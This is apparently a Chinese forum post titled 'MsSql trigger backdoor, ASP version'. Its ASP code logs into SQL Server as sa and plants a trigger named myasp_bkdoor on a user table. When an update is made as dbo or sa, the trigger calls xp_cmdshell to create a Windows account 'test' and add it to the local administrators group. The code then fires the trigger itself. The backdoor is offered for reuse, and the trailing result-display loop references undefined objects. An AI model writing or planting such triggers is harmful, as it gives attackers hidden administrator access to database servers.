MsSql 触发器后门asp版
<br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode1"><br /><%<br />'里边的变量代码大家用时自己改吧<br />On Error Resume next<br />Set conn=Server.CreateObject("ADODB.Connection") <br />DSN="driver={SQL Server};Server=(Local)\GSQL;database=baby;uid=sa;pwd=lcx;"<br />conn.Open DSN<br />if conn.State=1 then <br />response.write("成功") <br />sql="CREATE TRIGGER myasp_bkdoor"&Chr(10)&Chr(13)&"ON users_member"&Chr(10)&Chr(13)&"AFTER UPDATE"&Chr(10)&Chr(13)&"AS"&Chr(10)&Chr(13)&"IF user='dbo' OR user='sa'"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'dbo OR sa logon'"&Chr(10)&Chr(13)&"EXEC master..xp_cmdshell'net user test 123456 /add&&net localgroup administrators test /add'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13)&"ELSE"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'not dbo or sa privilage'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13) '建立myasp_bkdoor触发器,触发baby库中的users_member表的update操作加用户<br />SQL1="update users_member set email=3 where accountid=1" '触发<br />'sql2="drop TRIGGER myasp_bkdoor"<br />set rs=conn.execute(SQL)&conn.execute(SQL1,iRowsAffected, &H0001)'&conn.execute(SQL2) '触发<br />Do Until Rs.EOF<br /> Response.Write " <tr>" & vbNewLine<br /> For I = 0 To Rs.Fields.Count - 1<br /> Response.Write "<td>" & SQLOut(oRs(I)) & "</td>" & vbNewLine<br /> Next<br /> Response.Write " </tr>" & vbNewLine<br /> Rs.MoveNext<br /> Loop<br />else <br />response.write("失败") <br />end if <br />%><br /></div>
頁:
[1]